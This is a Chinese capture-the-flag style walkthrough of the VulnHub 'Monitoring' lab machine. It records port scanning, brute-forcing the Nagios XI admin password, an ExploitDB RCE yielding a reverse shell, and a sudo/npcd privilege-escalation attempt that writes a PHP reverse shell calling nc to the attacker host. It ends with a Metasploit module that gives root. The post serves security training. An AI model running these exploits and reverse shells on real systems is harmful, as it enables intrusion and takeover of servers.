实战打靶集锦-31-monitoring

  • 开发
  • 14

文章目录

靶机地址:https://download.vulnhub.com/monitoring/Monitoring.ova

1. 主机发现

目前只知道目标靶机在192.xx网段,通过如下的命令,看看这个网段上在线的主机。

$ nmap -sP 192.168.192.0/24

在这里插入图片描述

锁定靶机IP地址为192.168.192.132.

2. 端口扫描

针对目标靶机进行端口扫描。

$ sudo nmap -p- 192.168.192.132

在这里插入图片描述

3. 服务枚举

通过下面的命令扫描一下目标靶机开放端口上运行的服务。

$ sudo nmap -A -p22,25,80,389,443,5667 -sV -sT 192.168.192.132

在这里插入图片描述

4. 服务探查

服务不多,逐个试试看。

4.1 ssh服务

先试试22端口上的ssh服务。

$ ssh root@192.168.192.132

在这里插入图片描述

试了一下,可以访问,这为后面的爆破提供了可能。

4.2 smtp服务

试试25端口上的smtp服务。

$ telnet 192.168.192.132 25

在这里插入图片描述
这个端口可以用,不过还不太会,上网搜索一番。

$ nc 192.168.192.132 25

在这里插入图片描述
返回250说明响应成功,使用EHLO可以查看支持的各种扩展列表。

EHLO 192.168.192.132

在这里插入图片描述
再进一步试一下。
在这里插入图片描述
嗯,看来是可以用的,并且存在一个root@localhost的邮箱,根据后面探查的结果再回来看。

4.3 http/https服务

直接用浏览器访问一下。
在这里插入图片描述
可以访问,不过不知道Nagios是个啥玩意儿,搜索了一下,貌似是一个在线监控的工具。仔细浏览一下看看,发现有登录页面,如下图。
在这里插入图片描述
随便输入登录一下试试。
在这里插入图片描述
貌似没法枚举账号,尝试忘记密码试试看。
在这里插入图片描述
额,貌似跟邮件系统有了关联。可惜一顿折腾也没有搞定邮件系统。还是返回来进行目录枚举一下。

$ dirsearch -u http://192.168.192.132:80/

在这里插入图片描述
没发现有用的内容,还是尝试爆破一下root账号试试看,结果也失败了。还是上网看看有什么有用的信息吧。再官网上找到了一个安装指南(https://assets.nagios.com/downloads/nagiosxi/docs/installation-manual-of-Nagios-XI-2024.pdf),这里面默认用了一个nagiosadmin的管理员账号,如下图。
在这里插入图片描述
尝试用rockyou爆破一下这个账号试试。
在这里插入图片描述
最后爆破出来的nagiosadmin用户的密码是admin,手工登录看看。
在这里插入图片描述
登录成功,版本为Nagios XI 5.6.0。直接searchsploit搜索一下这个版本上有啥可以利用的漏洞。

$ searchsploit “Nagios XI”

在这里插入图片描述
貌似可以利用的EXP还不少,我们倒着看编号为49422的RCE漏洞。
首先再kali上4444端口建立监听。

$ nc -lvnp 4444

然后按照脚本提示,直接执行EXP。

$ python3 49422.py http://192.168.192.132 nagiosadmin admin 192.168.192.129 4444

在这里插入图片描述
顺利突破了边界,获得了反弹shell,如下图所示。
在这里插入图片描述

5. 系统提权

先优化一下shell。

www-data@ubuntu:/usr/local/nagiosxi/html/admin$ whereis python
www-data@ubuntu:/usr/local/nagiosxi/html/admin$ /usr/bin/python3.5 -c "import  pty; pty.spawn('/bin/bash')"

5.1 枚举系统信息

$ uname -a
$ cat /etc/*-release

是64位的ubuntu 16.04。
在这里插入图片描述

5.2 枚举passwd文件

$ cat /etc/passwd | grep -v nologin

在这里插入图片描述
正常的shell用户也不多。

5.3 枚举定时任务

枚举一下定时任务试试看。
在这里插入图片描述
没有合适的。

5.4 linpeas提权

直接使用linpeas提取。

$ chmod u+x linpeas.sh
$ sh linpeas.sh

下图所示的三个EXP是非常有可能的。
在这里插入图片描述

我们逐个试一下。

$ searchsploit -m 45010

然后在ubuntu 16.04上面编译一下。

$ gcc 45010.c -o 45010

然后上传到靶机的/tmp目录下执行一下试试看。

$ chmod u+x 45010
$ ./45010

在这里插入图片描述
提权失败,再试试第二个。
在这里插入图片描述
第二个直接卡住了,再试试第三个。
在这里插入图片描述
第三个也是没啥动静,宣告失败。
接着往下看,在sudo -l下面,有比较多有意思的内容,如下图所示。
在这里插入图片描述
看不太懂,不太会用,上网搜索下,发现有篇文章对(https://www.tenable.com/security/research/tra-2020-61)这个有一些总结性说明。现在尝试一下。

$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses=127.0.0.1/1 --output=/usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
$ echo -e "user = nagios\ngroup = nagios\nlog_type = file\nlog_file = /usr/local/nagios/var/npcd.log\nmax_logfile_size = 10485760\nlog_level = 0\nperfdata_spool_dir = /usr/local/nagiosxi/scripts/components/\nperfdata_file_run_cmd = /usr/bin/curl\nperfdata_file_run_cmd_args = file:///usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php -o /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php\nnpcd_max_threads = 5\nsleep_time = 15\nload_threshold = 10.0\npid_file=/usr/local/nagiosxi/var/subsys/npcd.pid\n\n# scrappy" > /usr/local/nagios/etc/pnp/npcd.cfg
$ echo -e "\x3c\x3fphp system('/bin/bash -i 2>&1 | nc 192.168.192.129 5555'); \x3f\x3e" > /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php test

可惜的是,监听一直反弹成功。从好多的现象来看,nagios用户的权限貌似比www-data要高,想办法切换到nagios用户试试看,直接用hydra爆破一下。

$ hydra -l nagios -P ../../rockyou.txt -vV -e ns 192.168.192.132 ssh

在这里插入图片描述
半天也没有结果,看来得想其它办法了。利用神器metasploit试试看。

$ msfconsole
msf6 > search nagios

在这里插入图片描述
看不太懂,不管了把Rank为Excellent并且Check为Yes的都试一下。
最后发现行号为19的EXP可以成功,如下所示。

msf6 > use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD admin
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 192.168.192.132
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 192.168.192.129
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

在这里插入图片描述
直接进来就是root权限,这个EXP比较牛逼。

6. 获取flag

在这里插入图片描述
成功获得flag,本次打靶到此结束。

阅读全部

相关推荐

  3. monitor-zabbix

    2024-07-22 07:02:05       18 阅读

  4. ceph之rados设计原理与实现第三章:集群的大脑monitor

    2024-07-22 07:02:05       58 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-22 07:02:05       52 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-22 07:02:05       54 阅读

  9. 在Django里面运行非项目文件

    2024-07-22 07:02:05       45 阅读

  19. Python语言-面向对象

    2024-07-22 07:02:05       55 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-22 07:02:05       50 阅读

热门阅读

  1. 初识数据结构中的“栈”

    2024-07-22 07:02:05       16 阅读

  3. 44、PHP 实现数据流中的中位数(含源码)

    2024-07-22 07:02:05       16 阅读

  6. Python面试题:Python中的单例模式及其实现

    2024-07-22 07:02:05       18 阅读

  8. JVM 中的OopMap与安全点

    2024-07-22 07:02:05       17 阅读

  11. 【Mybatis 整合 Oracle】在 xml 文件中 WITH 子句的简单使用

    2024-07-22 07:02:05       16 阅读

  14. 在 Ubuntu 22.04/20.04 安装 CVAT 和 SAM 指南

    2024-07-22 07:02:05       19 阅读

  15. C++多线程编程中的锁详解

    2024-07-22 07:02:05       18 阅读

  17. 生成对抗网络(GAN):目标检测的新前沿

    2024-07-22 07:02:05       15 阅读

  19. 机器学习浅讲

    2024-07-22 07:02:05       16 阅读

  22. 解决AutoDL服务器无法访问huggingface或SSL证书验证错误

    2024-07-22 07:02:05       19 阅读

  24. 动态内存规划

    2024-07-22 07:02:05       17 阅读

  29. js之深入对象和内置构造函数

    2024-07-22 07:02:05       18 阅读

  30. k8s安装powerjob

    2024-07-22 07:02:05       14 阅读